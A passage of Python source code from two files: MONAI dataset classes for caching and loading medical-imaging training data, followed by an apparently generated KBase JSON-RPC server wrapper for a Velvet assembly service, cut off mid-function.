num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cached content
(for example, randomly crop from the cached image and deepcopy the crop region)
or if every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 3: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work for below cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data(with the same index) together in a tuple.
If the output of single dataset is already a tuple, flatten it and extend to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
And if the datasets don't have same length, use the minimum length of them as the length
of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training based on images and the metadata, the array transforms can not be composed
because several transforms receives multiple parameters or return multiple values. Then Users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
Support to only load specific rows and columns.
And it can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
every item can be a int number or a range `[start, end)` for the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
|
VelvetServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Velvet.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Velvet'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Velvet.VelvetImpl import Velvet # noqa @IgnorePep8
impl_Velvet = Velvet(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Velvet'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Velvet.run_velvet,
name='Velvet.run_velvet',
types=[dict])
self.method_authentication['Velvet.run_velvet'] = 'required' # noqa
self.rpc_service.add(impl_Velvet.status,
name='Velvet.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Velvet ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
